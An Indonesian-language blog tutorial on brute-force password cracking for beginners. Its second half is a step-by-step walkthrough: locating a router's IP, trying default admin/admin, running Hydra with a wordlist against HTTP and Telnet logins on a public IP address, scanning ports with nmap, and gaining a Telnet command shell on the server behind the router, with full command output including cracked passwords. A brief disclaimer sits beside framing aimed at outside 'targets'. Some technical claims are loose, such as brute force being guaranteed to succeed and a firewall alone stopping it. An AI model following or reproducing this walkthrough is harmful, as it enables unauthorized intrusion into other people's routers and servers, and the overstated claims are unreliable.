Inilah Cara Melakukan Brute Force untuk Pemula

Hacking menjadi salah satu ilmu yang sangat digemari oleh orang-orang yang berkecimpung di bidang IT. Hal tersebut karena dengan ilmu ini, Anda seolah memiliki wewenang khusus ketimbang orang lain. Contohnya, Anda bisa memiliki akses khusus untuk layanan VIP. Ilmu ini banyak dipelajari oleh hacker dan cracker. Meskipun begitu, keduanya memiliki maksud yang berbeda dalam mempelajari ilmu ini. Itulah salah satu perbedaan hacker dengan cracker.

ads

Berbicara mengenai ilmu hacking, ada beberapa teknik yang bisa dipelajari. Salah satunya adalah Brute Force. Istilah ini sering berkaitan dengan hacking sebuah server yang menaungi sebuah website atau sebuah jaringan tertentu. Nah, apakah itu brute force?

Teknik hacking Brute Force adalah salah satu teknik hacking untuk meretas password sebuah server, jaringan, atau host, dengan cara mencoba semua kemungkinan kombinasi password yang ada pada wordlist atau “kamus password”. Metode ini dijamin akan berhasil menemukan password yang ingin diretas. Namun proses untuk meretas password dengan menggunakan metode ini akan memakan banyak waktu.

Teknik hacking ini pada awalnya bermula pada sebuah program komputer yang lebih mengandalkan kekuatan pemrosesan komputer dibandingkan kecerdasan manusia. Istilah brute force sendiri dipopulerkan oleh Kenneth Thompson, dengan mottonya: “When in doubt, use brute-force” (jika ragu, gunakan brute-force).

Mengapa disebut sebagai Brute Force? Nama “brute force” sendiri merupakan gabungan kata dari bahasa inggris, yang jika diterjemahkan ke dalam Bahasa Indonesia, memiliki arti “memaksa secara kasar”. Hal tersebut sesuai dengan prinsip kerja dari teknik ini, dimana hacker akan berusaha menjebol password sebuah sistem dengan mencoba berbagai kombinasi password yang tertulis di dalam sebuah “kamus” berupa wordlist.

Jika Anda mencoba memahami cara kerja dari teknik ini, Anda akan menemukan bahwa teknik ini akan melakukan penyerangan dari bagian depan saja. Anda membuka sebuah sistem, memasukan username seperti biasa, lalu Anda mencoba password mulai dari AAAA, AAAB, AAAC hingga ZZZZ. Yup, Anda seakan sedang berusaha mendobrak “pintu masuk” sebuah website dengan bekal “kamus password.”

Teknik ini sendiri sebenarnya tergolong sangat ampuh. Dengan suatu perangkat lunak khusus hacking, Anda bisa memasukan password sebuah sistem secara otomatis. Namun, jumlah password yang dimasukan mulai dari huruf A hingga ZZZZZ bisa jadi sangat banyak. Bahkan Anda harus memasukkan password ratusan kali. Memang, hal tersebut bisa dilakukan secara otomatis menggunakan perangkat lunak, tapi kamu juga harus menunggu perangkat lnuak tersebut memasukkan semua kemungkinan password hingga password berhasil ditemukan. Hal tersebut tentu saja akan memakan banyak waktu. Ibaratnya, Anda menunggu jawaban dari si doi yang ada kemungkinan besar diterima, dan kemungkinan besar juga di-PHP-in hehehe

Teknik brute force juga bisa memakan lebih banyak waktu lagi jika seandainya password yang hendak dijebol jumlah karakternya banyak. Bisa saja, password yang Anda jebol ternyata memiliki unsur @L4Y, misalkan saja “s1Be83PcanTique”. Kemungkinan makan waktu pun bertambah jika server yang ingin Anda hack ternyata menerapkan rentang waktu 5 menit setiap sekali Anda memasukan password. Teknik ini juga tergantung dari kecepatan prosesor komputer yang digunakan untuk melakukan teknik brute force. Sehingga, bisa jadi total waktu yang dibutuhkan untuk melakukan teknik Brute Force ini dapat memakan waktu hingga 1000 tahun lamanya, seperti lirik lagunya Tulus wkwkwk.

Beberapa faktor yang menjadi keuntungan seorang hacker, biasanya disebabkan oleh kemalasan manusia itu sendiri. Misalnya seperti menggunakan password bawaan dari perangkat sistem. Namun, ada juga beberapa hal yang mempengaruhi keberhasilan teknik ini, diantaranya:


  • Anggap bahwa password diketik dalam format huruf kecil (lower case).

Pada hal ini, waktu yang dibutuhkan untuk melakukan brute force akan cenderung sama. Tetapi jika salah satu atau beberapa karakter pada password mengandung huruf kapital (upper case), cara ini tidak akan berhasil.

  • Mencoba semua kemungkinan

Tujuh karakter huruf kecil (lower case) pada password dibutuhkan kurang lebih 4 jam untuk bisa mendapatkan password. Tetapi jika Anda mencoba semua kemungkinan kombinasi antara karakter upper case & lower case, Anda akan membutuhkan waktu sekitar 23 hari untuk mendapatkan password.

  • Metode trade-off.

Cara ini akan melakukan pencarian menggunakan kombinasi-kombinasi yang mungkin. Contohnya seperti “password”, “PASSWORD” dan “Password”. Kombinasi yang terdiri dari karakter yang rumit, seperti “pAssWOrD” tidak akan dimasukkan dalam proses. Dalam cara ini, lambatnya proses brute force bisa tertangani. Tetapi ada kemungkinan password tidak ditemukan karena belum tentu password yang hendak dijebol memiliki kombinasi yang rumit.

Lalu, bagaimana cara melakukan brute force? Kali ini, kami akan mengulasnya dalam artikel ini. Namun, artikel ini kami berikan sebagai sumber referensi bagi Anda yang hendak menguji keamanan suatu jaringan komputer atau server. Kami tidak bertanggungjawab jika cara-cara yang kami sampaikan di bawah ini digunakan untuk kegiatan yang tidak bertanggungjawab. Artikel kami kali ini akan mengulas mengenai cara melakukan brute force untuk mendapatkan password router. Baiklah, berikut ini pembahasannya:

  • Ketahui dulu IP router yang Anda gunakan. Caranya dengan menggunakan salah satu fungsi command prompt, yaitu sintaks “arp-a”. Misalkan router LAN 192.168.1.1 atau check IP public di checkmyip.com
  • Setelah Anda mendapatkan alamat IP-nya, maka akses alamat IP tersebut di browser.
  • Selanjutnya, Anda akan melihat halaman login untuk membuka halaman admin router pada browser.
  • Coba Anda menjebol login tersebut dengan menggunakan username admin dan password admin. Jika tidak menunjukkan hasil yang bagus, maka Anda pilih, terus maju atau tinggalkan target.
  • Jika Anda terus maju, maka Anda dapat menggunakan teknik brute force menggunakan perangkat lunak khusus hacking, Hydra. Poin selanjutnya adalah beberapa script yang Anda masukkan di Hydra.

H:\hydra>hydra -m / -l admin -P data.txt 180.254.70.135 http-get
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-10-17 14:27:56
[DATA] 11 tasks, 1 servers, 11 login tries (l:1/p:11), ~1 tries per task
[DATA] attacking service http-get on port 80
[STATUS] attack finished for 180.254.70.135 (waiting for childs to finish)
[80][www] host: 180.254.70.135   login: admin   password: basketball
Hydra (http://www.thc.org) finished at 2011-10-17 14:27:57
H:\hydra>

Bisa dilihat, dari contoh penggunaan Hydra di atas, diketahui bahwa password untuk username “admin” adalah “basketball. Kini Anda telah berhasil masuk ke router dengan password yang didapat. Jika Anda ingin melakukan hacking server di belakang router (backdoor), maka Anda dapat melakukan IP Forwarding dari router ke server yang berada di belakang router.

Saat ini, Anda tidak tahu IP-IP lokal berapa saja yang ada di belakang router, karena itu Anda dapat mengujinya satu persatu dengan melakukan ping walaupun hal tersebut tidak menjadi jaminan cara ini akan berhasil.

Contoh pelaksanannya, kita akan berasumsi bahwa alamat IP Server adalah 192.168.1.2. Setelah dilakukan ping menggunakan Command Prompt didapati sintaks seperti berikut:

D:\>ping 180.254.70.135
Pinging 180.254.70.135 with 32 bytes of data:
Reply from 180.254.70.135: bytes=32 time<1ms TTL=254
Reply from 180.254.70.135: bytes=32 time=2ms TTL=254
Reply from 180.254.70.135: bytes=32 time=11ms TTL=254
Reply from 180.254.70.135: bytes=32 time<1ms TTL=254

Setelah alamat IP Server berhasil di-ping, maka kita akan mencoba melakukan scanning port yang terbuka dengan NMAP.

C:\>nmap -v -A 180.254.70.135
Starting Nmap 5.21 ( http://nmap.org ) at 2011-10-17 15:28 Pacific Daylight Time
NSE: Loaded 36 scripts for scanning.
Initiating Ping Scan at 15:2
Scanning 180.254.70.135 [4 ports]
Completed Ping Scan at 15:28, 0.53s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:28
Completed Parallel DNS resolution of 1 host. at 15:28, 3.09s elapsed
Initiating SYN Stealth Scan at 15:28
Scanning 180.254.70.135 [1000 ports]
Discovered open port 23/tcp on 180.254.70.135
Discovered open port 80/tcp on 180.254.70.135
Discovered open port 3389/tcp on 180.254.70.135
Discovered open port 21/tcp on 180.254.70.135
Completed SYN Stealth Scan at 15:28, 2.34s elapsed (1000 total ports)

Dari hasil scanning dengan NMAP di atas, kita mendapatkan adanya port yang terbuka selain port 80, yaitu port 23 untuk telnet server. Dengan aktifnya port Telnet Server, maka Anda bisa melakukan teknik brute force melalui server Telnet dengan Hydra. Berikut ini sintaks yang dimasukkan:


H:\hydra>hydra -l administrator -P data.txt 180.254.70.135 telnet
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-10-17 15:21:22
[DATA] 6 tasks, 1 servers, 6 login tries (l:1/p:6), ~1 tries per task
[DATA] attacking service telnet on port 23
[STATUS] attack finished for 180.254.70.135 (waiting for childs to finish)
[23][telnet] host: 180.254.70.135   login: administrator   password: football
Hydra (http://www.thc.org) finished at 2011-10-17 15:21:26

Dari sintaks di atas, kita mendapatkan password telnetnya, yaitu “football”. Selanjutnya, masukkan login dan password yang telah Anda dapatkan. Dan akhirnya, Anda akan mendapatkan shell command dari Telnet Server.

Sebenarnya, teknik hacking brute force ini juga bisa digunakan untuk menjebol wi-fi loh. Anda bisa menyimak cara brute force wifi di artikel yang ada di situs kami ini.

Agar jaringan atau server terlindungi dari brute force, Anda harus tahu cara menjaga keamanan jaringan komputer, khususnya pada jaringan yang besar. Nah, perlindungan dari brute force ini bisa Anda dapatkan jika pada jaringan komputer Anda terdapat firewall. Salah satu manfaat firewall adalah untuk menangkal serangan hacker atau cracker, termasuk mereka yang menggunakan teknik brute force.

Nah, bagaimana artikel kami kali ini? Apakah Anda masih penasaran dengan teknik brute force? Anda bisa mempelajarinya di internet. Eitsss, tapi gunakan teknik ini untuk mengecek keamanan jaringan komputer Anda yahh. Sekian artikel kami pada kali ini. Semoga bermanfaat.

, ,
Oleh :
Kategori : Security Jaringan